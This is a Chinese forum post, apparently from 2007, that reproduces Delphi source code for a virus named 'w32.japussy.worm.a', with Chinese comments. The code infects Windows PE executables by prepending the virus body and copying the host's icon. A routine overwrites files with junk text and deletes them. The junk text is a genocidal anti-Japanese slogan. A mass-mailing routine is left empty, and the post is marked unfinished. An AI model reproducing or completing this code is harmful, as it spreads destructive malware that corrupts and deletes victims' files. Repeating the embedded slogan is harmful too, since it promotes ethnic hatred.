|
|
|
<p><span class="oblog_text">program japussy;<br/>uses<br/>windows, sysutils, classes, graphics, shellapi{, registry};<br/>const<br/>headersize = 82432; //病毒体的大小<br/>iconoffset = $12eb8; //pe文件主图标的偏移量<br/><br/>//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同<br/>//查找2800000020的十六进制字符串可以找到主图标的偏移量<br/> <br/>{<br/>headersize = 38912; //upx压缩过病毒体的大小<br/>iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量<br/><br/>//upx 1.24w 用法: upx -9 --8086 japussy.exe<br/>}<br/>iconsize = $2e8; //pe文件主图标的大小--744字节<br/>icontail = iconoffset + iconsize; //pe文件主图标的尾部<br/>id = $44444444; //感染标记<br/><br/>//垃圾码,以备写入<br/>catchword = 'if a race need to be killed out, it must be yamato. ' +<br/> 'if a country need to be destroyed, it must be japan! ' +<br/> '*** w32.japussy.worm.a ***';<br/>{$r *.res}<br/>function registerserviceprocess(dwprocessid, dwtype: integer): integer; <br/>stdcall; external 'kernel32.dll'; //函数声明<br/>var<br/>tmpfile: string;<br/>si: startupinfo;<br/>pi: process_information;<br/>isjap: boolean = false; //日文操作系统标记<br/>{ 判断是否为win9x }<br/>function iswin9x: boolean;<br/>var<br/>ver: tosversioninfo;<br/>begin<br/>result := false;<br/>ver.dwosversioninfosize := sizeof(tosversioninfo);<br/>if not getversionex(ver) then<br/> exit;<br/>if (ver.dwplatformid = ver_platform_win32_windows) then //win9x<br/> result := true;<br/>end;<br/>{ 在流之间复制 }<br/>procedure copystream(src: tstream; sstartpos: integer; dst: tstream;<br/>dstartpos: integer; count: integer);<br/>var<br/>scurpos, dcurpos: integer;<br/>begin<br/>scurpos := src.position;<br/>dcurpos := dst.position;<br/>src.seek(sstartpos, 0);<br/>dst.seek(dstartpos, 0);<br/>dst.copyfrom(src, count);<br/>src.seek(scurpos, 0);<br/>dst.seek(dcurpos, 0);<br/>end;<br/>{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }<br/>procedure extractfile(filename: string);<br/>var<br/>sstream, dstream: tfilestream;<br/>begin<br/>try<br/> sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);<br/> try<br/> dstream := tfilestream.create(filename, fmcreate);<br/> try<br/> sstream.seek(headersize, 0); //跳过头部的病毒部分<br/> dstream.copyfrom(sstream, sstream.size - headersize);<br/> finally<br/> dstream.free;<br/> end;<br/> finally<br/> sstream.free;<br/> end;<br/>except<br/>end;<br/>end;<br/>{ 填充startupinfo结构 }<br/>procedure fillstartupinfo(var si: startupinfo; state: word);<br/>begin<br/>si.cb := sizeof(si);<br/>si.lpreserved := nil;<br/>si.lpdesktop := nil;<br/>si.lptitle := nil;<br/>si.dwflags := startf_useshowwindow;<br/>si.wshowwindow := state;<br/>si.cbreserved2 := 0;<br/>si.lpreserved2 := nil;<br/>end;<br/>{ 发带毒邮件 }<br/>procedure sendmail;<br/>begin<br/>//哪位仁兄愿意完成之?<br/>end;<br/>{ 感染pe文件 }<br/>procedure infectonefile(filename: string);<br/>var<br/>hdrstream, srcstream: tfilestream;<br/>icostream, dststream: tmemorystream;<br/>iid: longint;<br/>aicon: ticon;<br/>infected, ispe: boolean;<br/>i: integer;<br/>buf: array[0..1] of char;<br/>begin<br/>try //出错则文件正在被使用,退出<br/> if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染<br/> exit;<br/> infected := false;<br/> ispe := false;<br/> srcstream := tfilestream.create(filename, fmopenread);<br/> try<br/> for i := 0 to $108 do //检查pe文件头<br/> begin<br/> srcstream.seek(i, sofrombeginning);<br/> srcstream.read(buf, 2);<br/> if (buf[0] = #80) and (buf[1] = #69) then //pe标记<br/> begin<br/> ispe := true; //是pe文件<br/> break;<br/> end;<br/> end;<br/> srcstream.seek(-4, sofromend); //检查感染标记<br/> srcstream.read(iid, 4);<br/> if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染<br/> infected := true;<br/> finally<br/> srcstream.free;<br/> end;<br/> if infected or (not ispe) then //如果感染过了或不是pe文件则退出<br/> exit;<br/> icostream := tmemorystream.create;<br/> dststream := tmemorystream.create;<br/> try<br/> aicon := ticon.create;<br/> try<br/> //得到被感染文件的主图标(744字节),存入流<br/> aicon.releasehandle;<br/> aicon.handle := extracticon(hinstance, pchar(filename), 0);<br/> aicon.savetostream(icostream);<br/> finally<br/> aicon.free;<br/> end;<br/> srcstream := tfilestream.create(filename, fmopenread);<br/> //头文件<br/> hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);<br/> try<br/> //写入病毒体主图标之前的数据<br/> copystream(hdrstream, 0, dststream, 0, iconoffset);<br/> //写入目前程序的主图标<br/> copystream(icostream, 22, dststream, iconoffset, iconsize);<br/> //写入病毒体主图标到病毒体尾部之间的数据<br/> copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);<br/> //写入宿主程序<br/> copystream(srcstream, 0, dststream, headersize, srcstream.size);<br/> //写入已感染的标记<br/> dststream.seek(0, 2);<br/> iid := $44444444;<br/> dststream.write(iid, 4);<br/> finally<br/> hdrstream.free;<br/> end;<br/> finally<br/> srcstream.free;<br/> icostream.free;<br/> dststream.savetofile(filename); //替换宿主文件<br/> dststream.free;<br/> end;<br/>except;<br/>end;<br/>end;<br/>{ 将目标文件写入垃圾码后删除 }<br/>procedure smashfile(filename: string);<br/>var<br/>filehandle: integer;<br/>i, size, mass, max, len: integer;<br/>begin<br/>try<br/> setfileattributes(pchar(filename), 0); //去掉只读属性<br/> filehandle := fileopen(filename, fmopenwrite); //打开文件<br/> try<br/> size := getfilesize(filehandle, nil); //文件大小<br/> i := 0;<br/> randomize;<br/> max := random(15); //写入垃圾码的随机次数<br/> if max < 5 then<br/> max := 5;<br/> mass := size div max; //每个间隔块的大小<br/> len := length(catchword);<br/> while i < max do<br/> begin<br/> fileseek(filehandle, i * mass, 0); //定位<br/> //写入垃圾码,将文件彻底破坏掉<br/> filewrite(filehandle, catchword, len);<br/> inc(i);<br/> end;<br/> finally<br/> fileclose(filehandle); //关闭文件<br/> end;<br/> deletefile(pchar(filename)); //删除之<br/>except<br/>end;<br/>end;</span></p><p><span class="oblog_text">(未完)</span></p> |
|
IP卡
狗仔卡
发表于 2007-3-23 08:44:18
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主
